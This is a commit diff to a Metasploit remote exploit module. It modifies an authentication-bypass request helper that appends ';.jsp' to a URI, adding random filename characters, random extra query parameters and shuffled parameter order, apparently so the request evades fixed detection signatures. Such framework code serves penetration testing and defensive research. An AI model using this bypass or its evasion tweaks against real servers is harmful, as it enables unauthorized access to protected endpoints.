we can shuffle the query params so the jsp param is not first. we can optionally add some characters before the trailing .jsp

sfewer-r7 2024-02-29 09:13:44 +00:00
parent b7200b52e1
commit f0ca5c10dc
1 changed files with 14 additions and 2 deletions


@ -93,10 +93,22 @@ class MetasploitModule < Msf::Exploit::Remote
# This is the authentication bypass vulnerability, allowing any authenticated endpoint to be access unauthenticated.
def send_auth_bypass_request_cgi(opts = {})
opts['vars_get'] = {
'jsp' => "#{opts['uri']};.jsp"
# The file name of the .jsp can be 0 or more characters (it just has to end in .jsp)
vars_get = {
'jsp' => "#{opts['uri']};#{Rex::Text.rand_text_alphanumeric(rand(8))}.jsp"
}
# Add in 0 or more random query parameters, and ensure the order is shuffled in the request.
0.upto(rand(8)) do
vars_get[Rex::Text.rand_text_alphanumeric(rand(1..8))] = Rex::Text.rand_text_alphanumeric(rand(1..16))
end
opts['vars_get'] = {} unless opts.key? 'vars_get'
opts['vars_get'].merge!(vars_get)
opts['shuffle_get_params'] = true
opts['uri'] = normalize_uri(target_uri.path, Rex::Text.rand_text_alphanumeric(8))
send_request_cgi(opts)